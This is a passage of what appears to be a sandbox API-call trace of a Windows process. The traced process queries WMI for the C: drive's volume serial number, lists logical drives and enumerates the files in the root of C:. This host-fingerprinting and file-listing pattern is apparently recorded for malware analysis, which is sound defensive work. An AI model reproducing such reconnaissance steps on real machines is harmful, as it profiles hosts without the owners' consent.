[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edff0 | out: ppvObject=0x6edff0*=0x0) returned 0x80004002 [0093.104] WbemDefPath:IUnknown:Release (This=0x601f198) returned 0x2 [0093.104] WbemDefPath:IUnknown:Release (This=0x601f198) returned 0x1 [0093.104] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0093.104] CoGetContextToken (in: pToken=0x6ee848 | out: pToken=0x6ee848) returned 0x0 [0093.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x6ee918*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee914 | out: ppvObject=0x6ee914*=0x601f198) returned 0x0 [0093.104] WbemDefPath:IUnknown:AddRef (This=0x601f198) returned 0x3 [0093.104] WbemDefPath:IUnknown:Release (This=0x601f198) returned 0x2 [0093.104] WbemDefPath:IWbemPath:SetText (This=0x601f198, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0093.104] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f198, puCount=0x6eea98 | out: puCount=0x6eea98*=0x2) returned 0x0 [0093.104] WbemDefPath:IWbemPath:GetText (in: This=0x601f198, lFlags=4, puBuffLength=0x6eea94*=0x0, pszText=0x0 | out: puBuffLength=0x6eea94*=0xf, pszText=0x0) returned 0x0 [0093.104] WbemDefPath:IWbemPath:GetText (in: This=0x601f198, lFlags=4, puBuffLength=0x6eea94*=0xf, pszText="00000000000000" | out: puBuffLength=0x6eea94*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0093.104] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eea98 | out: ppv=0x6eea98*=0xb51e34) returned 0x0 [0093.104] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eea90 | out: pAptType=0x6eea90*=1) returned 0x0 [0093.104] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eea94 | out: ppvObject=0x6eea94*=0x0) returned 0x80004002 [0093.104] IUnknown:Release (This=0xb51e34) returned 0x1 [0093.105] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee6b8 | out: ppv=0x6ee6b8*=0x601f348) returned 0x0 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f348, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee8d0 | out: ppvObject=0x6ee8d0*=0x0) returned 0x80004002 [0093.105] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f348, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee8e4 | out: ppvObject=0x6ee8e4*=0x601f700) returned 0x0 [0093.105] WbemLocator:IUnknown:Release (This=0x601f348) returned 0x0 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee504 | out: ppvObject=0x6ee504*=0x601f700) returned 0x0 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee4c0 | out: ppvObject=0x6ee4c0*=0x0) returned 0x80004002 [0093.105] WbemLocator:IUnknown:AddRef (This=0x601f700) returned 0x3 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ede1c | out: ppvObject=0x6ede1c*=0x0) returned 0x80004002 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eddcc | out: ppvObject=0x6eddcc*=0x0) returned 0x80004002 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eddd8 | out: ppvObject=0x6eddd8*=0x0) returned 0x80004002 [0093.105] CoGetContextToken (in: pToken=0x6ede38 | out: pToken=0x6ede38) returned 0x0 [0093.105] CoGetContextToken (in: pToken=0x6ee240 | out: pToken=0x6ee240) returned 0x0 [0093.105] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2d0 | out: ppvObject=0x6ee2d0*=0x0) returned 0x80004002 [0093.105] WbemLocator:IUnknown:Release (This=0x601f700) returned 0x2 [0093.105] WbemLocator:IUnknown:Release (This=0x601f700) returned 0x1 [0093.106] CoGetContextToken (in: pToken=0x6ee8b0 | out: pToken=0x6ee8b0) returned 0x0 [0093.106] CoGetContextToken (in: pToken=0x6ee810 | out: pToken=0x6ee810) returned 0x0 [0093.106] WbemLocator:IUnknown:QueryInterface (in: This=0x601f700, riid=0x6ee8e0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee8dc | out: ppvObject=0x6ee8dc*=0x601f700) returned 0x0 [0093.106] WbemLocator:IUnknown:AddRef (This=0x601f700) returned 0x3 [0093.106] WbemLocator:IUnknown:Release (This=0x601f700) returned 0x2 [0093.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f198, puCount=0x6eea74 | out: puCount=0x6eea74*=0x2) returned 0x0 [0093.106] WbemDefPath:IWbemPath:GetText (in: This=0x601f198, lFlags=8, puBuffLength=0x6eea70*=0x0, pszText=0x0 | out: puBuffLength=0x6eea70*=0xf, pszText=0x0) returned 0x0 [0093.106] WbemDefPath:IWbemPath:GetText (in: This=0x601f198, lFlags=8, puBuffLength=0x6eea70*=0xf, pszText="00000000000000" | out: puBuffLength=0x6eea70*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0093.106] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ee94c | out: ppv=0x6ee94c*=0x601f710) returned 0x0 [0093.106] WbemLocator:IWbemLocator:ConnectServer (in: This=0x601f710, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ee9e0 | out: ppNamespace=0x6ee9e0*=0x601f81c) returned 0x0 [0093.131] WbemLocator:IUnknown:QueryInterface (in: This=0x601f81c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee87c | out: ppvObject=0x6ee87c*=0xb5a6e4) returned 0x0 [0093.131] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a6e4, pProxy=0x601f81c, pAuthnSvc=0x6ee8cc, pAuthzSvc=0x6ee8c8, pServerPrincName=0x6ee8c0, pAuthnLevel=0x6ee8c4, pImpLevel=0x6ee8b4, pAuthInfo=0x6ee8b8, pCapabilites=0x6ee8bc | out: pAuthnSvc=0x6ee8cc*=0xa, pAuthzSvc=0x6ee8c8*=0x0, pServerPrincName=0x6ee8c0, pAuthnLevel=0x6ee8c4*=0x6, pImpLevel=0x6ee8b4*=0x2, pAuthInfo=0x6ee8b8, pCapabilites=0x6ee8bc*=0x1) returned 0x0 [0093.131] WbemLocator:IUnknown:Release (This=0xb5a6e4) returned 0x1 [0093.131] WbemLocator:IUnknown:QueryInterface (in: This=0x601f81c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee870 | out: ppvObject=0x6ee870*=0xb5a704) returned 0x0 [0093.131] WbemLocator:IUnknown:QueryInterface (in: This=0x601f81c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee86c | out: ppvObject=0x6ee86c*=0xb5a6e4) returned 0x0 [0093.131] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a6e4, pProxy=0x601f81c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0093.131] WbemLocator:IUnknown:Release (This=0xb5a6e4) returned 0x2 [0093.131] WbemLocator:IUnknown:Release (This=0xb5a704) returned 0x1 [0093.132] CoTaskMemFree (pv=0xb59028) [0093.132] WbemLocator:IUnknown:Release (This=0x601f710) returned 0x0 [0093.132] WbemLocator:IUnknown:QueryInterface (in: This=0x601f81c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee46c | out: ppvObject=0x6ee46c*=0xb5a704) returned 0x0 [0093.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee428 | out: ppvObject=0x6ee428*=0x0) returned 0x80004002 [0093.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee244 | out: ppvObject=0x6ee244*=0x0) returned 0x80004002 [0093.133] WbemLocator:IUnknown:AddRef (This=0xb5a704) returned 0x3 [0093.133] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edd84 | out: ppvObject=0x6edd84*=0x0) returned 0x80004002 [0093.133] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edd34 | out: ppvObject=0x6edd34*=0x0) returned 0x80004002 [0093.133] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edd40 | out: ppvObject=0x6edd40*=0xb5a664) returned 0x0 [0093.133] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a664, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edd48 | out: pCid=0x6edd48*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0093.133] WbemLocator:IUnknown:Release (This=0xb5a664) returned 0x3 [0093.133] CoGetContextToken (in: pToken=0x6edda0 | out: pToken=0x6edda0) returned 0x0 [0093.133] CoGetContextToken (in: pToken=0x6ee1a8 | out: pToken=0x6ee1a8) returned 0x0 [0093.133] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee238 | out: ppvObject=0x6ee238*=0xb5a6ec) returned 0x0 [0093.134] WbemLocator:IRpcOptions:Query (in: This=0xb5a6ec, pPrx=0xb5a704, dwProperty=2, pdwValue=0x6ee260 | out: pdwValue=0x6ee260) returned 0x80004002 [0093.134] WbemLocator:IUnknown:Release (This=0xb5a6ec) returned 0x3 [0093.134] WbemLocator:IUnknown:Release (This=0xb5a704) returned 0x2 [0093.134] CoGetContextToken (in: pToken=0x6ee780 | out: pToken=0x6ee780) returned 0x0 [0093.134] CoGetContextToken (in: pToken=0x6ee6e0 | out: pToken=0x6ee6e0) returned 0x0 [0093.134] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x6ee7b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6ee7ac | out: ppvObject=0x6ee7ac*=0x601f81c) returned 0x0 [0093.134] WbemLocator:IUnknown:AddRef (This=0x601f81c) returned 0x4 [0093.134] WbemLocator:IUnknown:Release (This=0x601f81c) returned 0x3 [0093.134] WbemLocator:IUnknown:Release (This=0x601f81c) returned 0x2 [0093.134] SysStringLen (param_1=0x0) returned 0x0 [0093.134] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6eeb44 | out: puCount=0x6eeb44*=0x0) returned 0x0 [0093.134] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=2, puBuffLength=0x6eeb40*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb40*=0x20, pszText=0x0) returned 0x0 [0093.135] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=2, puBuffLength=0x6eeb40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6eeb40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0093.135] CoGetContextToken (in: pToken=0x6ee7b0 | out: pToken=0x6ee7b0) returned 0x0 [0093.135] WbemLocator:IUnknown:AddRef (This=0xb5a704) returned 0x3 [0093.135] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a704, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee644 | out: ppvObject=0x6ee644*=0xb5a704) returned 0x0 [0093.135] WbemLocator:IUnknown:Release (This=0xb5a704) returned 0x3 [0093.135] WbemLocator:IUnknown:Release (This=0xb5a704) returned 0x2 [0093.135] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=2, puBuffLength=0x6eeb48*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb48*=0x20, pszText=0x0) returned 0x0 [0093.135] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=2, puBuffLength=0x6eeb48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6eeb48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0093.135] IWbemServices:GetObject (in: This=0x601f81c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6eeafc*=0x0, ppCallResult=0x0 | out: ppObject=0x6eeafc*=0x6021288, ppCallResult=0x0) returned 0x0 [0093.149] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f198, puCount=0x6eeafc | out: puCount=0x6eeafc*=0x2) returned 0x0 [0093.149] WbemDefPath:IWbemPath:GetText (in: This=0x601f198, lFlags=4, puBuffLength=0x6eeaf8*=0x0, pszText=0x0 | out: puBuffLength=0x6eeaf8*=0xf, pszText=0x0) returned 0x0 [0093.150] WbemDefPath:IWbemPath:GetText (in: This=0x601f198, lFlags=4, puBuffLength=0x6eeaf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6eeaf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0093.150] IWbemClassObject:Get (in: This=0x6021288, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6eeaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34eb12c*=0, plFlavor=0x34eb130*=0 | out: pVal=0x6eeaf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34eb12c*=8, plFlavor=0x34eb130*=0) returned 0x0 [0093.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0093.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0093.150] IWbemClassObject:Get (in: This=0x6021288, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34eb12c*=8, plFlavor=0x34eb130*=0 | out: pVal=0x6eeb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34eb12c*=8, plFlavor=0x34eb130*=0) returned 0x0 [0093.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0093.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0093.156] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0093.156] GetLogicalDrives () returned 0x4 [0093.158] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x6ee660, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.160] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x6ee67c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eeb6c) returned 1 [0093.161] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x6eebe8 | out: lpFileInformation=0x6eebe8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0093.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb68) returned 1 [0093.162] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee6e4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebb0) returned 1 [0093.166] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee6b8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.167] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee68c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.171] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFile") returned 0x0 [0093.174] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0093.179] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0093.179] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x6ee8d8 | out: lpFindFileData=0x6ee8d8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xb440e8 [0093.184] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0093.184] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0093.184] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0093.184] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0093.185] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0093.185] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0093.185] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0093.185] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0093.185] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0093.185] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xeea8ccc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xeea8ccc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, 